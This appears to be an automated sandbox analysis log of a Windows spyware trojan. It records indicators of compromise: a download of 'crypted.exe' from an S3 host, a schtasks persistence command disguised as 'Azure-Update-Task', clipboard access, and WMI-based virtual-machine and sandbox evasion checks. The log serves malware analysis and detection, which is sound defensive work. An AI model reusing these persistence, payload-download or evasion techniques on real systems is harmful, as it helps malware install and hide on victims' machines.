Source: eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmp | String found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
Source: eYvT1lg5Dy.exe, 00000001.00000002.438744669.00000000050AB000.00000004.00000001.sdmp, tmp6D2C.tmp.1.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmp | String found in binary or memory: https://api.ip.sb
Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmp | String found in binary or memory: https://api.ip.sb/geoip
Source: eYvT1lg5Dy.exe | String found in binary or memory: https://api.ip.sb/geoip%USERPEnviron
Source: eYvT1lg5Dy.exe, 00000001.00000002.435576900.00000000031A0000.00000004.00020000.sdmp | String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: eYvT1lg5Dy.exe, 00000001.00000002.438744669.00000000050AB000.00000004.00000001.sdmp, tmp6D2C.tmp.1.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: eYvT1lg5Dy.exe, 00000001.00000002.448050710.000000000A570000.00000004.00000001.sdmp | String found in binary or memory: https://cdn.ecosia/
Source: eYvT1lg5Dy.exe, 00000001.00000002.438259960.0000000004FCA000.00000004.00000001.sdmp | String found in binary or memory: https://cli-4576347563476534786.s3.us-east-2.amazonaws.com
Source: eYvT1lg5Dy.exe, 00000001.00000002.438259960.0000000004FCA000.00000004.00000001.sdmp | String found in binary or memory: https://cli-4576347563476534786.s3.us-east-2.amazonaws.com/crypted.exe
Source: eYvT1lg5Dy.exe, 00000001.00000002.438259960.0000000004FCA000.00000004.00000001.sdmp | String found in binary or memory: https://cli-4576347563476534786.s3.us-east-2.amazonaws.com4On
Source: eYvT1lg5Dy.exe, 00000001.00000002.438744669.00000000050AB000.00000004.00000001.sdmp, tmp6D2C.tmp.1.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: eYvT1lg5Dy.exe, 00000001.00000002.438744669.00000000050AB000.00000004.00000001.sdmp, tmp6D2C.tmp.1.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: eYvT1lg5Dy.exe, 00000001.00000002.438744669.00000000050AB000.00000004.00000001.sdmp, tmp6D2C.tmp.1.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmp | String found in binary or memory: https://get.adob
Source: eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmp | String found in binary or memory: https://helpx.ad
Source: eYvT1lg5Dy.exe, 00000001.00000002.438744669.00000000050AB000.00000004.00000001.sdmp, tmp6D2C.tmp.1.dr | String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: eYvT1lg5Dy.exe, 00000001.00000002.438744669.00000000050AB000.00000004.00000001.sdmp, tmp6D2C.tmp.1.dr | String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: eYvT1lg5Dy.exe, 00000001.00000002.438744669.00000000050AB000.00000004.00000001.sdmp, eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: eYvT1lg5Dy.exe, 00000001.00000002.438744669.00000000050AB000.00000004.00000001.sdmp, eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
Source: eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
Source: eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: eYvT1lg5Dy.exe, 00000001.00000002.438744669.00000000050AB000.00000004.00000001.sdmp, eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
Source: eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: eYvT1lg5Dy.exe, 00000001.00000002.438744669.00000000050AB000.00000004.00000001.sdmp, eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: eYvT1lg5Dy.exe | String found in binary or memory: https://www.digicert.com/CPS0
Source: eYvT1lg5Dy.exe, 00000001.00000002.438744669.00000000050AB000.00000004.00000001.sdmp, tmp6D2C.tmp.1.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown | DNS traffic detected: queries for: api.ip.sb
Source: global traffic | HTTP traffic detected: GET /crypted.exe HTTP/1.1 Host: cli-4576347563476534786.s3.us-east-2.amazonaws.com Connection: Keep-Alive
Source: unknown | HTTPS traffic detected: 52.219.104.152:443 -> 192.168.2.6:49741 version: TLS 1.2
Source: C:\Users\user\AppData\Local\Temp\filename.exe | Code function: 11_2_00401B3B OpenClipboard,GetClipboardData,GlobalFix,GlobalUnWire,CloseClipboard | 11_2_00401B3B
Source: C:\Users\user\AppData\Local\Temp\filename.exe | Code function: 11_2_00401AD7 GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,GlobalFree | 11_2_00401AD7
Source: eYvT1lg5Dy.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | Code function: 1_2_00408C60 | 1_2_00408C60
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | Code function: 1_2_0040DC11 | 1_2_0040DC11
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | Code function: 1_2_00407C3F | 1_2_00407C3F
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | Code function: 1_2_00418CCC | 1_2_00418CCC
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | Code function: 1_2_00406CA0 | 1_2_00406CA0
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | Code function: 1_2_004028B0 | 1_2_004028B0
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | Code function: 1_2_0041A4BE | 1_2_0041A4BE
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | Code function: 1_2_00418244 | 1_2_00418244
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | Code function: 1_2_00401650 | 1_2_00401650
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | Code function: 1_2_00402F20 | 1_2_00402F20
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | Code function: 1_2_004193C4 | 1_2_004193C4
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | Code function: 1_2_00418788 | 1_2_00418788
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | Code function: 1_2_00402F89 | 1_2_00402F89
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | Code function: 1_2_00402B90 | 1_2_00402B90
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | Code function: 1_2_004073A0 | 1_2_004073A0
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | Code function: String function: 0040E1D8 appears 44 times
Source: eYvT1lg5Dy.exe | Binary or memory string: OriginalFilename vs eYvT1lg5Dy.exe
Source: eYvT1lg5Dy.exe, 00000001.00000002.435576900.00000000031A0000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameShtups.exe4 vs eYvT1lg5Dy.exe
Source: eYvT1lg5Dy.exe, 00000001.00000002.435576900.00000000031A0000.00000004.00020000.sdmp | Binary or memory string: OriginalFilename_.dll4 vs eYvT1lg5Dy.exe
Source: eYvT1lg5Dy.exe | Static PE information: invalid certificate
Source: eYvT1lg5Dy.exe | Virustotal: Detection: 48%
Source: eYvT1lg5Dy.exe | Metadefender: Detection: 34%
Source: eYvT1lg5Dy.exe | ReversingLabs: Detection: 81%
Source: eYvT1lg5Dy.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\eYvT1lg5Dy.exe 'C:\Users\user\Desktop\eYvT1lg5Dy.exe'
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | Process created: C:\Users\user\AppData\Local\Temp\filename.exe 'C:\Users\user\AppData\Local\Temp\filename.exe'
Source: C:\Users\user\AppData\Local\Temp\filename.exe | Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' /tr 'C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe'
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe | Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' /tr 'C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe'
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | Process created: C:\Users\user\AppData\Local\Temp\filename.exe 'C:\Users\user\AppData\Local\Temp\filename.exe'
Source: C:\Users\user\AppData\Local\Temp\filename.exe | Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' /tr 'C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe'
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe | Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' /tr 'C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe'
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | File created: C:\Users\user\AppData\Local\Yandex
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | File created: C:\Users\user\AppData\Local\Temp\tmp450C.tmp
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@11/25@4/2
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | Code function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear | 1_2_004019F0
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6572:120:WilError_01
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe | Mutant created: \Sessions\1\BaseNamedObjects\0N1Y/53R10U5/BU51N355
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5524:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6760:120:WilError_01
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | Code function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear | 1_2_004019F0
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | Command line argument: 08A | 1_2_00413780
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: eYvT1lg5Dy.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: eYvT1lg5Dy.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: eYvT1lg5Dy.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: eYvT1lg5Dy.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: eYvT1lg5Dy.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: eYvT1lg5Dy.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: eYvT1lg5Dy.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: 1C:\leg21\vicodohubef11\bemov\nosiya\dajavut.pdb source: eYvT1lg5Dy.exe
Source: Binary string: C:\leg21\vicodohubef11\bemov\nosiya\dajavut.pdb source: eYvT1lg5Dy.exe
Source: Binary string: _.pdb source: eYvT1lg5Dy.exe
Source: Binary string: C:\dufire\fukiliyow\xefugopaja.pdb source: filename.exe, 0000000B.00000000.428820278.000000000041B000.00000002.00020000.sdmp, sihost.exe, 0000000E.00000000.440386838.000000000041B000.00000002.00020000.sdmp, filename.exe.1.dr
Source: eYvT1lg5Dy.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: eYvT1lg5Dy.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: eYvT1lg5Dy.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: eYvT1lg5Dy.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: eYvT1lg5Dy.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | Unpacked PE file: 1.2.eYvT1lg5Dy.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\filename.exe | Unpacked PE file: 11.2.filename.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe | Unpacked PE file: 14.2.sihost.exe.400000.0.unpack
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | Unpacked PE file: 1.2.eYvT1lg5Dy.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\user\AppData\Local\Temp\filename.exe | Unpacked PE file: 11.2.filename.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe | Unpacked PE file: 14.2.sihost.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | Code function: 1_2_0041C40C push cs; iretd | 1_2_0041C4E2
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | Code function: 1_2_00423149 push eax; ret | 1_2_00423179
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | Code function: 1_2_0041C50E push cs; iretd | 1_2_0041C4E2
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | Code function: 1_2_004231C8 push eax; ret | 1_2_00423179
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | Code function: 1_2_0040E21D push ecx; ret | 1_2_0040E230
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | Code function: 1_2_0041C6BE push ebx; ret | 1_2_0041C6BF
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | Code function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear | 1_2_004019F0
Source: eYvT1lg5Dy.exe | Static PE information: real checksum: 0x63442 should be: 0x6f057
Source: C:\Users\user\AppData\Local\Temp\filename.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | File created: C:\Users\user\AppData\Local\Temp\filename.exe

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\AppData\Local\Temp\filename.exe | Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' /tr 'C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe'
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeCode function: 11_2_00401000 LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_00401000
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion:

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Contains functionality to compare user and computer (likely to detect sandboxes)
Source: C:\Users\user\AppData\Local\Temp\filename.exe; Code function: GetModuleFileNameW,SHGetFolderPathW,PathAppendW,PathIsDirectoryW,CreateDirectoryW,PathAppendW,StrStrW,CopyFileW,ExitProcess, 11_2_00401272
Source: C:\Users\user\AppData\Local\Temp\filename.exe; Code function: GetModuleFileNameW,SHGetFolderPathW,PathAppendW,PathIsDirectoryW,CreateDirectoryW,PathAppendW,StrStrW,CopyFileW,ExitProcess, 11_2_02C614C2
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe; Code function: GetModuleFileNameW,SHGetFolderPathW,PathAppendW,PathIsDirectoryW,CreateDirectoryW,PathAppendW,StrStrW,CopyFileW,ExitProcess, 14_2_02C614C2
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe TID: 7144; Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe TID: 4280; Thread sleep count: 298 > 30
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe TID: 4280; Thread sleep time: -67050s >= -30000s
Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe; Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe; Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; Code function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 1_2_004019F0
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; Window / User API: threadDelayed 1511
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; Window / User API: threadDelayed 7573
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; Thread delayed: delay time: 922337203685477
Source: eYvT1lg5Dy.exe, 00000001.00000002.445386664.0000000008830000.00000004.00000001.sdmp; Binary or memory string: VMware
Source: eYvT1lg5Dy.exe, 00000001.00000002.445386664.0000000008830000.00000004.00000001.sdmp; Binary or memory string: Win32_VideoController(Standard display types)VMware694_EA66Win32_VideoController1_SV2HVUVideoController120060621000000.000000-0000074.129display.infMSBDA3CGN14WBPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsRFMZTRZ6
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; Code function: 1_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_0040CE09
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; Code function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 1_2_004019F0
Source: C:\Users\user\AppData\Local\Temp\filename.exe; Code function: 11_2_0040E650 _memset,_memset,_memset,_memset,InterlockedIncrement,__itow_s,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,_wcscpy_s,_wcscpy_s,_wcscat_s,_wcscat_s,_wcscat_s,__snwprintf_s,_wcscpy_s,_wcscpy_s,__cftoe,_wcscpy_s,__lock,GetFileType,_wcslen,WriteConsoleW,GetLastError,__cftoe,_wcslen,WriteFile,WriteFile,OutputDebugStringW,__itow_s, 11_2_0040E650
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; Code function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 1_2_004019F0
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; Code function: 1_2_0040ADB0 GetProcessHeap,HeapFree, 1_2_0040ADB0
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\filename.exe; Code function: 11_2_02C6092B mov eax, dword ptr fs:[00000030h] 11_2_02C6092B
Source: C:\Users\user\AppData\Local\Temp\filename.exe; Code function: 11_2_02C60D90 mov eax, dword ptr fs:[00000030h] 11_2_02C60D90
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe; Code function: 14_2_02C60D90 mov eax, dword ptr fs:[00000030h] 14_2_02C60D90
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe; Code function: 14_2_02C6092B mov eax, dword ptr fs:[00000030h] 14_2_02C6092B
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; Code function: 1_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_0040CE09
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; Code function: 1_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_0040E61C
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe; Code function: 1_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00416F6A
